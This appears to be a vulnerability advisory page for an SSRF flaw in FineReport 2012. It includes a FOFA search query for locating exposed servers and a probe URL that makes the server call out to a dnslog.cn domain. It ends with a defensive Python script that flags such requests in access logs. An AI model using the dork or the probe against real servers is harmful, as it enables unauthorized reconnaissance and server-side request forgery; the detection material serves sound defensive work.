# FineReport (帆软报表) 2012 SSRF Vulnerability

### Vulnerability Description <a href="#lou-dong-miao-shu" id="lou-dong-miao-shu"></a>

FineReport 2012 has an information disclosure vulnerability; requesting a specific URL results in SSRF.

### Affected Versions <a href="#lou-dong-ying-xiang" id="lou-dong-ying-xiang"></a>

FineReport 2012

### FOFA <a href="#fofa" id="fofa"></a>

```
body="down.download?FM_SYS_ID"
```

### Reproduction <a href="#lou-dong-fu-xian" id="lou-dong-fu-xian"></a>

The verification URL is:

```
/ReportServer?op=resource&resource=0m0m6k.dnslog.cn
```

![](https://4279400230-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-MgxNkYa2vR6HNnHdkjg%2F-MhmHlL9E8yT4gpG4xEK%2F-MhmIoRagsH3lUe82g0S%2Fimage.png?alt=media\&token=4597ac4f-8739-4481-8e41-e6720b7152e1)
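For defenders, the request shape shown above can be hunted for in web server access logs. The following is an added example, not part of the original page or of FineReport itself: it flags `/ReportServer` requests where `op=resource` carries a `resource` value shaped like a hostname or URL. It assumes combined-format access logs and assumes legitimate `resource` values are local paths starting with `/`; the log lines, the sample path and the function names are constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Request line inside a combined-format access log entry.
REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')
# A value shaped like a hostname or IPv4 address, optionally with port and path.
HOST_RE = re.compile(r'^(?:[a-z0-9-]+\.)+[a-z0-9-]+(?::\d+)?(?:/.*)?$', re.I)

def looks_remote(value):
    """True when the resource value names a host or URL instead of a local path."""
    value = value.strip()
    if "://" in value or value.startswith("//"):
        return True
    # Assumption: legitimate resource values are local paths beginning with "/".
    return not value.startswith("/") and bool(HOST_RE.match(value))

def find_ssrf_probes(log_lines):
    """Return (line_number, resource_value) for suspicious ReportServer requests."""
    hits = []
    for number, line in enumerate(log_lines, start=1):
        match = REQUEST_RE.search(line)
        if not match:
            continue
        url = urlsplit(match.group(1))
        if not url.path.lower().endswith("/reportserver"):
            continue
        # parse_qs percent-decodes values; keys are lower-cased to catch OP=/Resource=.
        params = {k.lower(): v for k, v in parse_qs(url.query).items()}
        if "resource" not in [op.lower() for op in params.get("op", [])]:
            continue
        hits.extend((number, r) for r in params.get("resource", []) if looks_remote(r))
    return hits

# Constructed sample log lines (not taken from a real server).
SAMPLE_LOG = [
    '203.0.113.5 - - [01/Jan/2024:10:00:00 +0000] "GET /ReportServer?op=resource&resource=/com/fr/web/core/js/jquery.js HTTP/1.1" 200 512',
    '203.0.113.9 - - [01/Jan/2024:10:00:05 +0000] "GET /ReportServer?op=resource&resource=probe.example.test HTTP/1.1" 200 0',
    '203.0.113.9 - - [01/Jan/2024:10:00:07 +0000] "GET /WebReport/ReportServer?OP=resource&resource=http%3A%2F%2Fprobe.example.test%2F HTTP/1.1" 200 0',
    '203.0.113.7 - - [01/Jan/2024:10:00:09 +0000] "GET /ReportServer?reportlet=demo.cpt HTTP/1.1" 200 900',
]

if __name__ == "__main__":
    for number, value in find_ssrf_probes(SAMPLE_LOG):
        print(f"line {number}: remote resource value {value!r}")
```

Correlate any hits with outbound DNS and HTTP logs from the report server, since a relative file name without a leading `/` would also match the hostname pattern.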
